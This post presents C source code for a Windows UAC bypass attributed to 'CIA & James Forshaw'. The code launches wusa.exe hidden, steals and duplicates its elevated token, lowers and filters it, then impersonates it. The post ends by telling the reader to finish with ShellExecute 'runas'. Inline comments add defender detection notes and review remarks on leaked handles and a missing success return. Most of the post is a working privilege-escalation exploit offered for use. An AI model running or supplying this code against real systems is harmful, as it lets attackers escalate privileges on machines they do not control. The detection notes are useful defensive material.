This is an implementation of a UAC bypass method (Author: CIA & James Forshaw).
Works from Windows 7 to the latest Windows 10 Fall Creators Update.
Code:
/*
 * StepOverUAC - builds a medium-integrity, filtered copy of the token of an
 * auto-elevated wusa.exe process and impersonates it in the calling thread.
 *
 * Returns 0 on any failed Win32/NT call. NOTE(review): the success path at the
 * end of the function falls off without a return statement, so the value a
 * caller reads on success is undefined.
 *
 * Defender notes (from what this code visibly does):
 *  - wusa.exe is started hidden (SW_HIDE) and terminated right after its
 *    token is opened; a very short-lived wusa.exe with no arguments, started
 *    by a non-installer parent, is a detection opportunity.
 *  - A medium-integrity process opening the primary token of an elevated
 *    process with MAXIMUM_ALLOWED and then calling NtSetInformationToken /
 *    NtFilterToken on a duplicate is the core of the technique; token
 *    manipulation telemetry (e.g. handle-to-token events) can surface it.
 *  - NOTE(review): this class of auto-elevation abuse is generally assumed to
 *    depend on the UAC prompt level being below "Always notify" — confirm
 *    against the target build before relying on that as a mitigation.
 *  - None of the handles or the SID allocated below are released in this
 *    function; the pipe handles (inRead/inWrite/outRead/outWrite) are
 *    declared outside the visible code.
 */
int StepOverUAC()
{
/* Inheritable handles: the pipes are created so a child can inherit them.
 * The pipe handle variables are not declared in this function. */
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
if (!CreatePipe(&inRead, &inWrite, &sa, 0))
return 0;
if (!CreatePipe(&outRead, &outWrite, &sa, 0))
return 0;
/* Native token APIs are resolved at run time from ntdll rather than linked;
 * the returned pointers are not NULL-checked before use. rts is never used. */
NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
/* Most of these locals (Error, bytesIO, hTest, bCond, sh, ptml, si, si2,
 * pi, pi2, szBuffer) are declared but never referenced in this function. */
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
HANDLE filterToken = NULL;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo, sh;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si, si2;
PROCESS_INFORMATION pi, pi2;
WCHAR szBuffer[MAX_PATH];
/* Launch wusa.exe hidden, keeping its process handle (SEE_MASK_NOCLOSEPROCESS).
 * Detection: wusa.exe started with no arguments from an unexpected parent. */
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = L"wusa.exe";
shinfo.nShow = SW_HIDE;
if (!ShellExecuteEx(&shinfo))
return 0;
/* Open the new process's primary token, then kill the process immediately.
 * Detection: a wusa.exe whose lifetime is only a few milliseconds. */
if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
return 0;
TerminateProcess(shinfo.hProcess, -1);
WaitForSingleObject(shinfo.hProcess, -1);
/* Duplicate the stolen token as a primary token with full access. */
if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
return 0;
/* Build a Medium mandatory-label SID and lower the duplicate's integrity
 * level to it via NtSetInformationToken. pIntegritySid is never FreeSid'd. */
if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
return 0;
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = pIntegritySid;
Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
if (!NT_SUCCESS(Status))
return 0;
/* Filter the lowered token with flag 0x4; the NTSTATUS is not checked, so a
 * failure here is only noticed when ImpersonateLoggedOnUser rejects the
 * (still NULL) filterToken. */
filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
/* Impersonate the filtered token on the calling thread. */
if (!ImpersonateLoggedOnUser(filterToken))
return 0;
/* NOTE(review): no return value on the success path (undefined behaviour for
 * a non-void function whose result is used); no CloseHandle on hProcessToken,
 * hNewToken, filterToken or shinfo.hProcess. */
}
After this, just use ShellExecute with the "runas" verb.